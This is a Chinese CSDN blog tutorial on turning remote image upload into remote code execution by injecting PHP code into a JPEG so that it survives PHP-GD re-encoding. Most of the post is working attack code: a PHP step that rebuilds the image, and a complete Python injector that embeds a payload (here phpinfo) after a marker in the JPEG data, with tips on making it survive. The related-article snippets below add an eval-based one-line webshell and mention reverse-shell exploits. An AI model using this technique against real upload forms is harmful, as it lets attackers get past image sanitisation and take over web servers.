远程图像上传导致RCE(将恶意代码注入PHP-GD图像)

最新推荐文章于 2022-12-13 18:51:52 发布
最新推荐文章于 2022-12-13 18:51:52 发布
阅读量712 收藏
点赞数
分类专栏: WEB安全小记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43536759/article/details/105237613
版权

jpg图片

前期准备

php-gd安装

https://www.php.net/manual/zh/book.image.php
https://www.dmxzone.com/go/5001/how-do-i-install-gd-in-windows/

素材

自己手机照相机拍照就是jpg图片.

php-gd重建

您需要先使用php-gd重新创建.jpg图像,然后再使用gd-jpeg.py注入有效负载

<?php
$jpg = imagecreatefromjpeg('image.jpg');
imagejpeg($jpg, 'poc.jpg',-1);
imagedestroy($jpg);
?>

然后将有效载荷注入poc.jpg

python脚本

#!/usr/bin/python
import sys
import binascii

magic_number = "03010002110311003f00"

def main():
    
    jpeg = 'poc.jpg'
    payload = '<?phpinfo()?>'.encode('ascii')#payload
    output = 'payload_poc.jpg'

    loc = get_loc(jpeg)
    inject_payload(jpeg, loc, payload, output)


def get_loc(jpeg):
    print("Searching for magic number...")
    f = open(jpeg, 'rb')
    contents = f.read()
    loc = contents.find(binascii.unhexlify(magic_number))
    f.close()

    if loc:
        print("Found magic number.")
        return loc
    else:
        print("Magic number not found. Exiting.")
        sys.exit()


def inject_payload(jpeg, loc, payload, output):

    f = open(jpeg, 'rb')
    fo = open(output, 'wb')

    print("Injecting payload...")
    contents = f.read()
    pre_payload = contents[:loc + len(binascii.unhexlify(magic_number))]
    post_payload = contents[loc + len(binascii.unhexlify(magic_number)):]
    fo.write(pre_payload + payload + post_payload + '\n'.encode('ascii'))
    print("Payload written.")
    f.close()
    fo.close()

if __name__ == "__main__":
    main()

php脚本

你也可以使用https://xz.aliyun.com/t/2657#toc-7中的脚本。

完成

为了确保注入的有效负载正常运行,请尝试使用php-gd重新创建。
在这里插入图片描述

仅当imagejpeg函数的$quality参数以默认质量(默认-1)重新创建图像时,此方法才有效。如果参数为其他组这无效。

需要注意的是有的图片容易报错,就不能用,试试其他图片,也可以用php-gd重新创建几回,自己试试,不是每个jpg图片都可以用是最麻烦的。

gif图片

参考https://xz.aliyun.com/t/2657#toc-2

png图片

https://xz.aliyun.com/t/2657#toc-3

图片素材

参考1
参考2

参考

https://medium.com/@asdqwedev/remote-image-upload-leads-to-rce-inject-malicious-code-to-php-gd-image-90e1e8b2aada

火 柴 人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bypass-PHP-GD-Process-To-RCE:参考
06-14
绕过-PHP-GD-Process-To-RCE 描述 使用 Similar-Block-Attack 绕过 PHP-GD 进程到 RCE。 用法 用法: php codeinj.php <src> <inj> php codeinj.php demo.gif "<?php phpinfo();?>" 然后新图像gd_demo.gif...
php命令注入绕过姿势,挖洞姿势:特殊的上传技巧,绕过PHP图片转换实现远程代码执行(RCE)...
weixin_42510600的博客
03-10 452
我使用了一个特殊的图片上传技巧,绕过PHP GD库对图片的转换处理,最终成功实现了远程代码执行。事情是这样的。当时我正在测试该网站上是否存在sql注入漏洞,不经意间我在网站个人页面发现了一个用于上传头像的文件上传表单。开始时我并没指望在上传功能处发现漏洞,但我决定试试。我上传了一个图片文件,通过截断http数据包,修改jpg图片的文件名后缀为php,然后继续上传。我惊讶的居然上传成功了,我几乎不敢...
php+gd+漏洞+7.0.20,论PHP常见的漏洞 | WooYun知识库
weixin_39958138的博客
03-09 727
首先拿到一份源码 肯定是先install上。 而在安装文件上又会经常出现问题。一般的安装文件在安装完成后 基本上都不会自动删除这个安装的文件 我遇到过的会自动删除的好像也就qibocms了。其他的基本都是通过生成一个lock文件 来判断程序是否安装过了 如果存在这个lock文件了 就会退出了。 这里首先 先来说一下安装文件经常出现的问题。根本无验证。这种的虽然不多 但是有时还是会遇到个。 在安装完...
网络靶场实战-PHP代码执行--PNG注入
最新发布
蛇矛实验室
12-13 1257
当服务器可以将图像文件解释为PHP时,例如弱扩展检查、解析漏洞、本地文件包含漏洞、错误配置PHP解析扩展等方式,可以使用这些技术来造成代码执行。蛇矛实验室成立于2020年,致力于安全研究、攻防解决方案、靶场对标场景仿真复现及技战法设计与输出等相关方向。团队核心成员均由从事安全行业10余年经验的安全专家组成,团队目前成员涉及红蓝对抗、渗透测试、逆向破解、病毒分析、工控安全以及免杀等相关领域。
利用无参数的RCE注入写一个一句话木马
qq_51553814的博客
10-22 3422
昨天做了一个无参数注入RCE的题,学到后面发现还可以直接用RCE写一个一句话木马进去 今天来总结一下 以下是源码 <?php header("content-type:text/html;charset=utf-8"); if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { echo "error"; } highlight_file
文件上传漏洞绕过方法和防御方法
Kris__zhang的博客
07-22 5946
文章目录上传流程概述客户端检测绕过检测(js检测)绕过方式1. 利用firebug禁用js2. 通过brup等代理工具服务端检测绕过(MIME检测)绕过方式通过brup等代理工具服务端检测绕过(扩展名检测)绕过方式文件名大小写绕过名单列表绕过特殊文件名绕过截断绕过.htaccess 文件攻击服务端检测绕过(文件内容检测)文件头检测文件加载检测解析攻击直接攻击配合攻击Apache 解析漏洞IIS 解析漏洞php-cgi 上传流程概述 一个文件以http协议上传的时候,将以post请求发送至web服务器。服务器
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
CVE-2020-0796-RCE-POC:CVE-2020-0796远程执行代码POC
03-19
CVE-2020-0796远程执行代码POC (c)2020 ZecOps,Inc.- ://www.zecops.com-查找攻击者的错误CVE-2020-0796 /“ SMBGhost”的远程代码执行POC预期结果:具有系统访问权限的反向Shell。仅用于公司环境中的教育和测试...
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
Umbraco-RCE:Umbraco CMS 7.12.4-(已认证)远程执行代码
03-21
Umbraco RCE漏洞利用/ PoC Umbraco CMS 7.12.4-(已认证)远程执行代码 [ ] [ ]用法$ python exploit.py -husage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]Umbraco authenticated RCEoptional ...
对某网站的渗透(SQL注入+上传Getshell)
热门推荐
江左盟的博客
04-22 1万+
信息收集 访问网站发现网站不存在robots.txt文件,扫描网站根目录未发现有价值的信息,点击网站按钮查看功能的时候发现有个路径是xxcms/…,然后访问xxcms发现网站跳转到后台,如图: 尝试弱口令和暴力枚举未发现正确口令,然后扫描xxcms目录发现一个未授权上传文件的页面,如图: 但是之能上传图片和office文档,尝试绕过失败,在主页和“投诉建议”功能处存在搜索框,但不存在SQL注入,如图: 点击“我要投诉/建议”发现可以写数据并提交,如图: 点击按钮之后其中一个数据包如图: 漏洞发现
【Vulnhub靶场】通过sql注入漏洞,文件上传漏洞拿下网站webshell
weixin_45619494的博客
10-12 709
00 页面没变化?发现上传的路径没法知道,用7kbscan扫描,发现http://192.168.93.132/admin/uploads,进入。点击test,发现多了个图片,上面url变成http://192.168.93.132/cat.php?返回首页,检查源代码,发现图片的变化是通过id的变化来改变的。
php注入上传图片验证
weixin_34059951的博客
01-09 214
Mysql注入:SQL Injection with MySQL 作者:angel 发布时间:2005-04-21 来源:4ngel.net 本文已经发表在《黑客防线》7月刊,转载请注明。由于写了很久,随着技术的进步,本人也发现该文里有不少错误和罗嗦的地方。请各位高手看了不要笑。本文写于《Advance...
在图片注入(伪静态注入)习题情况下得到的知识集合
zezai3010的博客
12-13 2642
一、伪静态注入 (一)伪静态定义: 为了实时的显示一些信息。或者还想运用动态脚本解决一些问题。不能用静态的方式来展示网站内容。伪静态只是改变了URL的表现形式,实际上还是动态页面。 例:http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/ 和http://lab1.xseclab.com/sqli6_f37a4a60
php 图片中的恶意代码,图片攻击-BMP图片中注入恶意JS代码 <转载>
weixin_33462804的博客
03-27 980
昨天看到一篇文章《hacking throung images》,里面介绍了如何在BMP格式的图片里注入JS代码,使得BMP图片既可以正常显示, 也可以运行其中的JS代码,觉得相当有趣。 执行JS注入的脚本 关键:构造符合正常BMP格式的图片 步骤 1. 将原BMP文件的第三,第四字节替换为\x2F\x2A, 对应js中的注释符号/* BMP文件的第三、四、五、六字节表示BMP文件的大小 2. 在...
用友GRP-u8 注入-RCE漏洞
maverickpig的博客
07-09 5817
用友GRP-u8 注入-RCE漏洞 工作中遇到的漏洞,基于前人的复现教程成功复现,记录下自己的复现笔记,如有侵权,请联系我删除 漏洞详情 用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。 该系统被曝存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。最终产生两种后果,一是可以进行SQL注入,执行SQL语句;二是导致命令执行,当用户可以控制命令执行函数中
imagemaick的ghostscript RCE漏洞修复
HRay's blog
08-24 825
漏洞信息可以参考imagemaick的ghost script RCE漏洞 目前最全的修复方案参考https://www.kb.cert.org/vuls/id/332928 编辑ImageMagick的policy文件,默认路径为/etc/ImageMagick/policy.xml 在&lt;policymap&gt;标签中增加如下内容 &lt;policy domain="co...
FusionAuth 1.10 RCE漏洞(CVE-2020-7799):预览功能漏洞利用
攻击者可能通过精心构造的数据,将包含恶意脚本的参数传递给服务器,使得服务器在处理这些数据时执行了非预期的代码。具体来说,如示例中的请求中,攻击者可能隐藏了用于执行代码的payload,通过HTTP头部或者表单...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值